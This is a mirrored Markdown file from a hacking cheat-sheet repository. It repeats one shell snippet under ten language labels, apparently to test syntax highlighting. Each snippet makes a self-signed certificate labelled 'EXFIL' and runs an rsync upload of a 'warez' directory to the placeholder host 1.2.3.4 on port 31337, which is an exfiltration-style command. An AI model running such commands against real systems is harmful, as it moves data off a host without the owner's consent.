mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-08-24 17:02:29 +02:00
70 lines
1.7 KiB
Markdown
70 lines
1.7 KiB
Markdown
applescript
|
|
```applescript
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
elixir
|
|
```elixir
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
julia
|
|
```julia
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
livescript
|
|
```livescript
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
pgsql
|
|
```pgsql
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
php
|
|
```php
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
powershell
|
|
```powershell
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
r
|
|
```r
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
ruby
|
|
```ruby
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|
|
|
|
sql
|
|
```sql
|
|
# this is a comment
|
|
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
|
rsync -av warez rsync://1.2.3.4:31337/up
|
|
```
|